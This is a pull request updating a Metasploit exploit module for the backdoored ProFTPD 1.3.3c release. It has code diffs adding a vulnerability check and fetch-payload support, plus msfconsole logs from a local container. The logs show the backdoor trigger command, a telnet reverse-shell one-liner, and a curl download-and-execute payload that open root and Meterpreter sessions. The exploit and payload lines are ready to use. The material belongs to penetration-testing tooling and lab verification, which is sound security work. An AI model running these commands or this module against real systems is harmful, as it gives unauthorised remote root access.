### PR TITLE
proftpd_133c_backdoor: Various improvements

### DIFF
--- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
+++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
@@ -97,6 +97,15 @@ class MetasploitModule < Msf::Exploit::Remote
       handler
     end
 
+    report_vuln(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      sname: 'ftp',
+      name: name,
+      info: 'HELP ACIDBITCHEZ backdoor triggered',
+      refs: references
+    )
     disconnect
   end
 end

--- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
+++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
@@ -27,20 +27,20 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'BID', '45150' ]
         ],
         'Privileged' => true,
-        'Platform' => [ 'unix' ],
+        'Platform' => [ 'unix', 'linux' ],
         'Arch' => ARCH_CMD,
         'Payload' => {
           'Space' => 2000,
           'BadChars' => '',
-          'DisableNops' => true,
-          'Compat' =>
-                        {
-                          'PayloadType' => 'cmd',
-                          'RequiredCmd' => 'generic perl telnet',
-                        }
+          'DisableNops' => true
         },
         'Targets' => [
-          [ 'Automatic', {} ],
+          [
+            'Linux/Unix Command',
+            {
+              'Type' => :unix_cmd
+            }
+          ]
         ],
         'DisclosureDate' => '2010-12-02',
         'DefaultTarget' => 0,

--- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
+++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
@@ -19,7 +19,11 @@ class MetasploitModule < Msf::Exploit::Remote
           ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]
           archive between November 28th 2010 and 2nd December 2010.
         },
-        'Author' => [ 'MC', 'darkharper2' ],
+        'Author' => [
+          'MC',
+          'darkharper2',
+          'g0tmi1k' # @g0tmi1k - additional features
+         ],
         'License' => MSF_LICENSE,
         'References' => [
           [ 'CVE', '2010-20103' ],
@@ -45,9 +49,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2010-12-02',
         'DefaultTarget' => 0,
         'Notes' => {
-          'Reliability' => UNKNOWN_RELIABILITY,
-          'Stability' => UNKNOWN_STABILITY,
-          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+          'Reliability' => [REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS]
         }
       )
     )

--- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
+++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'MC',
           'darkharper2',
           'g0tmi1k' # @g0tmi1k - additional features
-         ],
+        ],
         'License' => MSF_LICENSE,
         'References' => [
           [ 'CVE', '2010-20103' ],
@@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Appears('No response to backdoor command, so server may have dropped into shell mode') if res.blank?
     return CheckCode::Safe("Backdoor command not present (server returned: #{res.to_s.strip})") if res&.match?(/^5/)
+
     CheckCode::Unknown("Unexpected behaviour/unknown response (timeout or connection dropped?): #{res.to_s.strip})")
   rescue ::Rex::ConnectionError, ::IOError => e
     CheckCode::Unknown("Connection failed: #{e.message}")
@@ -84,17 +85,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     connect
+    vprint_status("FTP Banner: #{banner_version}") if banner
 
-    print_status("Sending Backdoor Command")
+    print_status('Sending FTP command to trigger backdoor')
     sock.put("HELP ACIDBITCHEZ\r\n")
-
     res = sock.get_once(-1, 10)
 
-    if (res and res =~ /502/)
-      print_error("Not backdoored")
-    else
-      sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
-      handler
+    fail_with(Failure::NoAccess, "No backdoor (#{res.to_s.strip})") if res =~ /^5/
+
+    unless payload.encoded.empty?
+      c = 'nohup '
+      c << payload.encoded
+      c << " >/dev/null 2>&1\n"
+      vprint_status("Running: #{c.strip}")
+      sock.put(c)
+      print_status('Payload sent - awaiting callback')
     end
 
     report_vuln(
@@ -106,6 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
       info: 'HELP ACIDBITCHEZ backdoor triggered',
       refs: references
     )
+  ensure
     disconnect
   end
 end

--- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
+++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Ftp
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -52,6 +53,29 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     deregister_options('FTPUSER', 'FTPPASS')
+  end
+
+  def check
+    connect
+
+    return CheckCode::Unknown('No FTP banner received') unless banner
+
+    vprint_status("FTP Banner: #{banner_version}")
+
+    return CheckCode::Safe("Target does not appear to be running ProFTPD (banner: #{banner_version})") unless banner_version.include?('ProFTPD')
+    return CheckCode::Safe("ProFTPD version is not 1.3.3c (banner: #{banner_version})") unless banner_version.include?('1.3.3c')
+
+    print_status('ProFTPD 1.3.3c detected, testing for backdoor command...')
+    sock.put("HELP ACIDBITCHEZ\r\n")
+    res = sock.get_once(-1, 10)
+
+    return CheckCode::Appears('No response to backdoor command, so server may have dropped into shell mode') if res.blank?
+    return CheckCode::Safe("Backdoor command not present (server returned: #{res.to_s.strip})") if res&.match?(/^5/)
+    CheckCode::Unknown("Unexpected behaviour/unknown response (timeout or connection dropped?): #{res.to_s.strip})")
+  rescue ::Rex::ConnectionError, ::IOError => e
+    CheckCode::Unknown("Connection failed: #{e.message}")
+  ensure
+    disconnect
   end
 
   def exploit


### PR DESCRIPTION
This PR is to:

- Add a `check()` function
- Update module metadata (notes)
- Add fetch payload support
- Able to be more verbose

```
        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  1      2         1      0      0      1
After : *        default  1      2         1      0      0      3

```

Target is a container.

## Setup

```console
$ docker run --rm -p 2121:21 -p 40000-40100:40000-40100 --name proftpd registry.gitlab.com/g0tmi1k/proftpd-docker:1.3.3c
957886ff9327 - ProFTPD 1.3.3c (maint) (built Mon Apr 27 2026 11:29:16 UTC) standalone mode STARTUP
```

## Before

- Had to select a payload before it would run
- No check

```console
$ ./msfconsole -q -x 'db_status; workspace -D;
setg VERBOSE true; setg RHOSTS 127.0.0.1; setg LHOST docker0;
use exploit/unix/ftp/proftpd_133c_backdoor;
set RPORT 2121;'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 127.0.0.1
LHOST => docker0
RPORT => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) > check
[-] This module does not support check.
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[-] 127.0.0.1:2121 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(unix/ftp/proftpd_133c_backdoor) > set PAYLOAD payload/cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[+] sh -c '(sleep 4124|telnet 172.17.0.1 4444|while : ; do sh && break; done 2>&1|telnet 172.17.0.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 172.17.0.1:4444
[*] 127.0.0.1:2121 - Connecting to FTP server...
[*] 127.0.0.1:2121 - Connected to target FTP server
[*] 127.0.0.1:2121 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo N81yL1lITDnUhqcY;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "N81yL1lITDnUhqcY\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:44842) at 2026-05-21 10:55:26 +0100

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
^Z
Background session 1? [y/N]  y
msf exploit(unix/ftp/proftpd_133c_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      0      0      1

msf exploit(unix/ftp/proftpd_133c_backdoor) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
127.0.0.1             Unknown                    device

msf exploit(unix/ftp/proftpd_133c_backdoor) > services
Services
========

host       port  proto  name  state  info                                                 resource  parents
----       ----  -----  ----  -----  ----                                                 --------  -------
127.0.0.1  2121  tcp    ftp   open   ProFTPD 1.3.3c Server (ProFTPD Docker Installation)  {}        tcp (2121/tcp)
127.0.0.1  2121  tcp    tcp   open                                                        {}

msf exploit(unix/ftp/proftpd_133c_backdoor) > vulns

Vulnerabilities
===============

Timestamp                Host       Service         Resource  Name                                       References
---------                ----       -------         --------  ----                                       ----------
2026-05-21 09:55:25 UTC  127.0.0.1  ftp (2121/tcp)  {}        ProFTPD 1.3.3c Backdoor Command Execution  CVE-2010-20103,OSVDB-69562,BID-45150

msf exploit(unix/ftp/proftpd_133c_backdoor) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type        Data
 ----                     ----       -------  ----  --------  ----        ----
 2026-05-21 09:55:08 UTC  127.0.0.1  ftp      2121  tcp       ftp.banner  {:banner=>"220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]"}

msf exploit(unix/ftp/proftpd_133c_backdoor) >
```

## After

- More verbose
- Check support

```console
$ ./msfconsole -q -x 'db_status; workspace -D;
setg VERBOSE true; setg RHOSTS 127.0.0.1; setg LHOST docker0;
use exploit/unix/ftp/proftpd_133c_backdoor;
set RPORT 2121;'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 127.0.0.1
LHOST => docker0
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
RPORT => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) > check
[*] 127.0.0.1:2121 - Connecting to FTP server...
[*] 127.0.0.1:2121 - Connected to target FTP server
[*] 127.0.0.1:2121 - FTP Banner: ProFTPD 1.3.3c
[*] 127.0.0.1:2121 - ProFTPD 1.3.3c detected, testing for backdoor command...
[+] 127.0.0.1:2121 - The target appears to be vulnerable. No response to backdoor command, so server may have dropped into shell mode
msf exploit(unix/ftp/proftpd_133c_backdoor) >
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[*] Command to run on remote host: curl -so ./NttRBpQidN http://172.17.0.1:8080/-j0Kg1-XEKLxv08PWln5tg;chmod +x ./NttRBpQidN;./NttRBpQidN&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /-j0Kg1-XEKLxv08PWln5tg
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] 127.0.0.1:2121 - Running automatic check ("set AutoCheck false" to disable)
[*] 127.0.0.1:2121 - Connecting to FTP server...
[*] 127.0.0.1:2121 - Connected to target FTP server
[*] 127.0.0.1:2121 - FTP Banner: ProFTPD 1.3.3c
[*] 127.0.0.1:2121 - ProFTPD 1.3.3c detected, testing for backdoor command...
[+] 127.0.0.1:2121 - The target appears to be vulnerable. No response to backdoor command, so server may have dropped into shell mode
[*] 127.0.0.1:2121 - Connecting to FTP server...
[*] 127.0.0.1:2121 - Connected to target FTP server
[*] 127.0.0.1:2121 - FTP Banner: ProFTPD 1.3.3c
[*] 127.0.0.1:2121 - Sending FTP command to trigger backdoor
[*] 127.0.0.1:2121 - Running: nohup curl -so ./NttRBpQidN http://172.17.0.1:8080/-j0Kg1-XEKLxv08PWln5tg;chmod +x ./NttRBpQidN;./NttRBpQidN& >/dev/null 2>&1
[*] 127.0.0.1:2121 - Payload sent — awaiting callback
[*] Client 172.17.0.2 requested /-j0Kg1-XEKLxv08PWln5tg
[*] Sending payload to 172.17.0.2 (curl/8.14.1)
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:36250) at 2026-05-21 11:01:52 +0100

meterpreter > background
[*] Backgrounding session 1...
msf exploit(unix/ftp/proftpd_133c_backdoor) > workspace -vf

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      0      0      3

msf exploit(unix/ftp/proftpd_133c_backdoor) > hosts

Hosts
=====

address    mac  name          os_name                                 os_flavor  os_sp  purpose  info  comments
-------    ---  ----          -------                                 ---------  -----  -------  ----  --------
127.0.0.1       3c6646e4ea9c  Debian 13.4 (Linux 6.19.11+kali-amd64)                    server

msf exploit(unix/ftp/proftpd_133c_backdoor) > services
Services
========

host       port  proto  name  state  info            resource  parents
----       ----  -----  ----  -----  ----            --------  -------
127.0.0.1  2121  tcp    ftp   open   ProFTPD 1.3.3c  {}        tcp (2121/tcp)
127.0.0.1  2121  tcp    tcp   open                   {}

msf exploit(unix/ftp/proftpd_133c_backdoor) > vulns

Vulnerabilities
===============

Timestamp                Host       Service         Resource  Name                                       References
---------                ----       -------         --------  ----                                       ----------
2026-05-21 10:01:22 UTC  127.0.0.1  ftp (2121/tcp)  {}        ProFTPD 1.3.3c Backdoor Command Execution  CVE-2010-20103,OSVDB-69562,BID-45150

msf exploit(unix/ftp/proftpd_133c_backdoor) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type                         Data
 ----                     ----       -------  ----  --------  ----                         ----
 2026-05-21 10:01:12 UTC  127.0.0.1  ftp      2121  tcp       ftp.banner                   {:banner=>"220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]"}
 2026-05-21 10:01:12 UTC  127.0.0.1  ftp      2121  tcp       ftp.cpe                      {:cpe=>"cpe:/a:proftpd:proftpd:1.3.3c"}
 2026-05-21 10:01:52 UTC  127.0.0.1                           host.os.session_fingerprint  {:name=>"3c6646e4ea9c", :os=>"Debian 13.4 (Linux 6.19.11+kali-amd64)", :arch=>"x64"}

msf exploit(unix/ftp/proftpd_133c_backdoor) >
```